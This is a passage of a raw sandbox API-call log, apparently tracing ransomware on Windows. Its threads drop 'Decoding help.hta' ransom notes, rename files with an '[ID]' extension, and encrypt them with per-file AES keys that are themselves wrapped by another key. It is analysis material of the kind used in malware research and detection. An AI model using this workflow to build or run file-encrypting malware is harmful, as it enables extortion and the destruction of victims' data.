Office\\Templates\\1033\\AdjacencyLetter.dotx" [0057.604] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx.[ID]g9uZrLhJaygpwRm1[ID]" [0057.605] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyletter.dotx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyletter.dotx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\1033\\AdjacencyLetter.dotx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\adjacencyletter.dotx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x69c [0057.605] CreateFileMappingA (hFile=0x69c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9a8 [0057.605] CryptAcquireContextA (in: phProv=0x1f3dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1f3dfcec*=0x3449d70) returned 1 [0060.169] CryptGenKey (in: hProv=0x3449d70, Algid=0x6610, dwFlags=0x1, phKey=0x1f3dfce8 | out: phKey=0x1f3dfce8*=0x5e2bf0) returned 1 [0060.169] CryptExportKey (in: hKey=0x5e2bf0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1f3dfbe4, pdwDataLen=0x1f3dfce4 | out: pbData=0x1f3dfbe4*, pdwDataLen=0x1f3dfce4*=0x2c) returned 1 [0060.169] MapViewOfFile (hFileMappingObject=0x9a8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x329e0) returned 0x3070000 [0061.206] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1f3dfbe4*, pdwDataLen=0x1f3dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1f3dfbe4*, pdwDataLen=0x1f3dfcf8*=0x100) returned 1 [0061.210] CryptEncrypt (hKey=0x5e2bf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070000, pdwDataLen=0x1f3dfce4*=0x329e0, dwBufLen=0x329e0) Thread: id = 472 os_tid = 0x860 [0045.322] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*", lpFindFileData=0x1f51fd30 | out: lpFindFileData=0x1f51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x696f1810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a70 [0045.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.323] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1f51fd30 | out: lpFindFileData=0x1f51fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x696f1810, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.323] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.323] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1f51fd30 | out: lpFindFileData=0x1f51fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a1600, ftCreationTime.dwHighDateTime=0x1c65230, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb67a1600, ftLastWriteTime.dwHighDateTime=0x1c65230, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maple.gif", cAlternateFileName="")) returned 1 [0047.479] lstrcpyW (in: lpString1=0x11521328, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*" [0047.479] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*") returned 72 [0047.479] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Decoding help.hta" [0047.479] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\decoding help.hta")) returned 0xffffffff [0047.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x644 [0050.354] WriteFile (in: hFile=0x644, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f51fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f51fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.657] CloseHandle (hObject=0x644) returned 1 [0052.159] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.707] FindNextFileW (in: hFindFile=0x5e2a70, lpFindFileData=0x1f51fd30 | out: lpFindFileData=0x1f51fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb67a1600, ftCreationTime.dwHighDateTime=0x1c65230, ftLastAccessTime.dwLowDateTime=0x696f1810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb67a1600, ftLastWriteTime.dwHighDateTime=0x1c65230, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maple.gif", cAlternateFileName="")) returned 0 [0056.707] FindClose (in: hFindFile=0x5e2a70 | out: hFindFile=0x5e2a70) returned 1 Thread: id = 473 os_tid = 0x850 [0045.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x1f65fd30 | out: lpFindFileData=0x1f65fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a30 [0045.323] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.323] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1f65fd30 | out: lpFindFileData=0x1f65fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.323] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.323] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1f65fd30 | out: lpFindFileData=0x1f65fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.323] FindClose (in: hFindFile=0x5e2a30 | out: hFindFile=0x5e2a30) returned 1 Thread: id = 474 os_tid = 0x83c [0045.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x1f79fd30 | out: lpFindFileData=0x1f79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2a30 [0045.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.324] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1f79fd30 | out: lpFindFileData=0x1f79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.324] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.324] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1f79fd30 | out: lpFindFileData=0x1f79fd30*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0047.481] lstrcpyW (in: lpString1=0x11529330, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" [0047.481] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned 51 [0047.481] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta" [0047.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\decoding help.hta")) returned 0xffffffff [0047.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x490 [0050.358] WriteFile (in: hFile=0x490, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f79fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f79fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0051.666] CloseHandle (hObject=0x490) returned 1 [0055.319] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.204] lstrcmpiW (lpString1="Decoding help.hta", lpString2="qmgr0.dat") returned -1 [0058.204] lstrlenW (lpString="qmgr0.dat") returned 9 [0058.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" [0058.204] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned 51 [0058.204] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpString2="qmgr0.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0058.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0058.204] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0058.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr0.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr0.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.204] FindNextFileW (in: hFindFile=0x5e2a30, lpFindFileData=0x1f79fd30 | out: lpFindFileData=0x1f79fd30*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xdd404870, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x0, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0058.204] lstrcpyW (in: lpString1=0x25390260, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" [0058.204] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned 51 [0058.204] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta" [0058.204] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\decoding help.hta")) returned 0x1 [0058.204] lstrcmpiW (lpString1="Decoding help.hta", lpString2="qmgr1.dat") returned -1 [0058.205] lstrlenW (lpString="qmgr1.dat") returned 9 [0058.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*" [0058.205] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*") returned 51 [0058.205] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\", lpString2="qmgr1.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0058.205] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" [0058.205] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]" [0058.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x634 [0058.206] CreateFileMappingA (hFile=0x634, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x750 [0058.206] CryptAcquireContextA (in: phProv=0x1f79fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1f79fcec*=0x3448720) returned 1 [0060.183] CryptGenKey (in: hProv=0x3448720, Algid=0x6610, dwFlags=0x1, phKey=0x1f79fce8 | out: phKey=0x1f79fce8*=0x42cf2d8) returned 1 [0060.183] CryptExportKey (in: hKey=0x42cf2d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1f79fbe4, pdwDataLen=0x1f79fce4 | out: pbData=0x1f79fbe4*, pdwDataLen=0x1f79fce4*=0x2c) returned 1 [0060.183] MapViewOfFile (hFileMappingObject=0x750, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xb290000 [0063.820] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1f79fbe4*, pdwDataLen=0x1f79fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1f79fbe4*, pdwDataLen=0x1f79fcf8*=0x100) returned 1 [0063.820] CryptEncrypt (hKey=0x42cf2d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xb290000, pdwDataLen=0x1f79fce4*=0x100000, dwBufLen=0x100000) Thread: id = 475 os_tid = 0x820 [0045.324] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*.*", lpFindFileData=0x1f8dfd30 | out: lpFindFileData=0x1f8dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2930 [0045.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.325] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1f8dfd30 | out: lpFindFileData=0x1f8dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.325] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.325] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1f8dfd30 | out: lpFindFileData=0x1f8dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0045.325] FindClose (in: hFindFile=0x5e2930 | out: hFindFile=0x5e2930) returned 1 Thread: id = 476 os_tid = 0x56c [0045.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x1fa1fd30 | out: lpFindFileData=0x1fa1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2930 [0045.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.325] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1fa1fd30 | out: lpFindFileData=0x1fa1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd943744, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.325] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.325] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1fa1fd30 | out: lpFindFileData=0x1fa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0045.326] lstrcmpW (lpString1=".", lpString2="MachineKeys") returned -1 [0045.326] lstrcmpW (lpString1="..", lpString2="MachineKeys") returned -1 [0045.326] lstrcmpiW (lpString1="windows", lpString2="MachineKeys") returned 1 [0047.483] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*" [0047.483] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*") returned 43 [0047.483] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\", lpString2="MachineKeys" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys" [0047.483] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*" [0047.483] GlobalMemoryStatus (in: lpBuffer=0x1fa1fd10 | out: lpBuffer=0x1fa1fd10) [0048.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x971a1c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x270 [0048.405] CloseHandle (hObject=0x270) returned 1 [0048.405] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1fa1fd30 | out: lpFindFileData=0x1fa1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0048.405] FindClose (in: hFindFile=0x5e2930 | out: hFindFile=0x5e2930) returned 1 Thread: id = 477 os_tid = 0x41c [0045.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x1fb5fd30 | out: lpFindFileData=0x1fb5fd30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, 